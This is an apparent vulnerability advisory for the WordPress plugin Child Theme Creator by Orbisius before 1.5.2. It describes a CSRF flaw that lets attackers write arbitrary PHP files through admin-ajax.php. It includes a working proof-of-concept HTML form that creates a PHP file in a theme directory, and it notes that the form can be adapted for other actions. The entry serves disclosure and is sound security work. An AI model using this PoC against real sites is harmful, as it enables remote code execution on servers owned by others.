WordPress Plugin Vulnerabilities
Child Theme Creator by Orbisius < 1.5.2 - CSRF to Arbitrary File Modification/Creation
Description
This flaw gave attackers the ability to forge requests on behalf of an administrator in order to modify arbitrary theme files and create new PHP files, which could allow an attacker to achieve remote code execution (RCE) on a vulnerable site’s server.
Proof of Concept
The following will create hello.php in the /twentytwenty theme directory. You can just swap out sub_cmd and theme files for the other AJAX actions.
<html>
<body>
<form action="http://URL/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="theme_2" value="twentytwenty" />
<input type="hidden" name="theme_2_file" value="hello.php" />
<input type="hidden" name="theme_2_file_contents" value="<?php phpinfo();?>" />
<input type="hidden" name="theme_2_new_file" value="" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="action" value="orbisius_ctc_theme_editor_ajax" />
<input type="hidden" name="sub_cmd" value="save_file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> Affects Plugins
Fixed in version 1.5.2
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
No
Timeline
Publicly Published
2020-10-14 (about 2 years ago)
Added
2020-10-14 (about 2 years ago)
Last Updated
2020-11-17 (about 2 years ago)